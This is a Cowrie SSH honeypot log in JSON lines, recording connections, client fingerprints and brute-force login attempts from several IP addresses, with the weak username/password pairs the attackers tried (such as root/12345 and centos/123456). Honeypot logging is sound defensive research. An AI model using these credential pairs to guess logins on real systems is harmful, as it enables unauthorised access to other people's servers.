{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T01:02:32.513582Z","src_ip":"171.243.150.245","session":"42d4da59cb33"}
{"eventid":"cowrie.login.success","username":"root","password":"12345","message":"login attempt [root/12345] succeeded","sensor":"my-vps","timestamp":"2025-08-28T01:02:33.556376Z","src_ip":"171.243.150.245","session":"0a9a0f827305"}
{"eventid":"cowrie.login.failed","username":"1234","password":"1234","message":"login attempt [1234/1234] failed","sensor":"my-vps","timestamp":"2025-08-28T01:02:34.617220Z","src_ip":"171.243.150.245","session":"42d4da59cb33"}
{"eventid":"cowrie.session.closed","duration":"5.5","message":"Connection lost after 5.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:02:37.832306Z","src_ip":"171.243.150.245","session":"42d4da59cb33"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":36790,"dst_ip":"1.2.3.4","dst_port":22,"session":"3961b9eaabd3","protocol":"ssh","message":"New connection: 194.233.79.134:36790 (1.2.3.4:22) [session: 3961b9eaabd3]","sensor":"my-vps","timestamp":"2025-08-28T01:02:50.148693Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T01:02:50.221101Z","src_ip":"194.233.79.134","session":"3961b9eaabd3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T01:02:50.454813Z","src_ip":"194.233.79.134","session":"3961b9eaabd3"}
{"eventid":"cowrie.login.failed","username":"weblogic","password":"weblogic","message":"login attempt [weblogic/weblogic] failed","sensor":"my-vps","timestamp":"2025-08-28T01:02:51.404379Z","src_ip":"194.233.79.134","session":"3961b9eaabd3"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:02:52.591813Z","src_ip":"194.233.79.134","session":"3961b9eaabd3"}
{"eventid":"cowrie.session.closed","duration":"50.6","message":"Connection lost after 50.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:02:56.159866Z","src_ip":"171.243.150.245","session":"0a9a0f827305"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59518,"dst_ip":"1.2.3.4","dst_port":22,"session":"06b35be5a89e","protocol":"ssh","message":"New connection: 212.227.125.160:59518 (1.2.3.4:22) [session: 06b35be5a89e]","sensor":"my-vps","timestamp":"2025-08-28T01:03:12.288409Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T01:03:12.290519Z","src_ip":"212.227.125.160","session":"06b35be5a89e"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T01:03:13.462981Z","src_ip":"212.227.125.160","session":"06b35be5a89e"}
{"eventid":"cowrie.login.failed","username":"1234","password":"1234","message":"login attempt [1234/1234] failed","sensor":"my-vps","timestamp":"2025-08-28T01:03:16.367689Z","src_ip":"212.227.125.160","session":"06b35be5a89e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59538,"dst_ip":"1.2.3.4","dst_port":22,"session":"11490bd0ef6e","protocol":"ssh","message":"New connection: 212.227.125.160:59538 (1.2.3.4:22) [session: 11490bd0ef6e]","sensor":"my-vps","timestamp":"2025-08-28T01:03:17.171939Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T01:03:17.173095Z","src_ip":"212.227.125.160","session":"11490bd0ef6e"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T01:03:17.419590Z","src_ip":"212.227.125.160","session":"11490bd0ef6e"}
{"eventid":"cowrie.session.closed","duration":"5.3","message":"Connection lost after 5.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:03:17.605931Z","src_ip":"212.227.125.160","session":"06b35be5a89e"}
{"eventid":"cowrie.login.failed","username":"nikita","password":"nikita","message":"login attempt [nikita/nikita] failed","sensor":"my-vps","timestamp":"2025-08-28T01:03:18.429293Z","src_ip":"212.227.125.160","session":"11490bd0ef6e"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:03:19.714883Z","src_ip":"212.227.125.160","session":"11490bd0ef6e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":65223,"dst_ip":"1.2.3.4","dst_port":22,"session":"ed5323730301","protocol":"ssh","message":"New connection: 212.227.235.229:65223 (1.2.3.4:22) [session: ed5323730301]","sensor":"my-vps","timestamp":"2025-08-28T01:03:37.732995Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T01:03:37.734301Z","src_ip":"212.227.235.229","session":"ed5323730301"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T01:03:37.860530Z","src_ip":"212.227.235.229","session":"ed5323730301"}
{"eventid":"cowrie.login.failed","username":"magdalena","password":"7777777","message":"login attempt [magdalena/7777777] failed","sensor":"my-vps","timestamp":"2025-08-28T01:03:38.473501Z","src_ip":"212.227.235.229","session":"ed5323730301"}
{"eventid":"cowrie.login.failed","username":"magdalena","password":"abc123","message":"login attempt [magdalena/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T01:03:39.603502Z","src_ip":"212.227.235.229","session":"ed5323730301"}
{"eventid":"cowrie.login.failed","username":"magdalena","password":"abcd123","message":"login attempt [magdalena/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T01:03:40.737558Z","src_ip":"212.227.235.229","session":"ed5323730301"}
{"eventid":"cowrie.login.failed","username":"magdalena","password":"abcd1234","message":"login attempt [magdalena/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T01:03:41.898514Z","src_ip":"212.227.235.229","session":"ed5323730301"}
{"eventid":"cowrie.login.failed","username":"magdalena","password":"abc1234","message":"login attempt [magdalena/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-28T01:03:43.036771Z","src_ip":"212.227.235.229","session":"ed5323730301"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:03:44.167313Z","src_ip":"212.227.235.229","session":"ed5323730301"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.150.245","src_port":44424,"dst_ip":"1.2.3.4","dst_port":22,"session":"5dfed908141e","protocol":"ssh","message":"New connection: 171.243.150.245:44424 (1.2.3.4:22) [session: 5dfed908141e]","sensor":"my-vps","timestamp":"2025-08-28T01:03:53.523754Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T01:03:53.527308Z","src_ip":"171.243.150.245","session":"5dfed908141e"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T01:03:53.772479Z","src_ip":"171.243.150.245","session":"5dfed908141e"}
{"eventid":"cowrie.login.failed","username":"nikita","password":"nikita","message":"login attempt [nikita/nikita] failed","sensor":"my-vps","timestamp":"2025-08-28T01:03:54.948865Z","src_ip":"171.243.150.245","session":"5dfed908141e"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:03:56.175093Z","src_ip":"171.243.150.245","session":"5dfed908141e"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":34640,"dst_ip":"1.2.3.4","dst_port":22,"session":"66dd2810cdff","protocol":"ssh","message":"New connection: 194.233.79.134:34640 (1.2.3.4:22) [session: 66dd2810cdff]","sensor":"my-vps","timestamp":"2025-08-28T01:04:31.022235Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T01:04:31.082361Z","src_ip":"194.233.79.134","session":"66dd2810cdff"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T01:04:31.281576Z","src_ip":"194.233.79.134","session":"66dd2810cdff"}
{"eventid":"cowrie.login.failed","username":"centos","password":"123456","message":"login attempt [centos/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T01:04:33.415349Z","src_ip":"194.233.79.134","session":"66dd2810cdff"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:04:34.937490Z","src_ip":"194.233.79.134","session":"66dd2810cdff"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.151.203","src_port":53018,"dst_ip":"1.2.3.4","dst_port":22,"session":"9bf0bece6b62","protocol":"ssh","message":"New connection: 171.243.151.203:53018 (1.2.3.4:22) [session: 9bf0bece6b62]","sensor":"my-vps","timestamp":"2025-08-28T01:04:47.078414Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T01:04:47.712428Z","src_ip":"171.243.151.203","session":"9bf0bece6b62"}
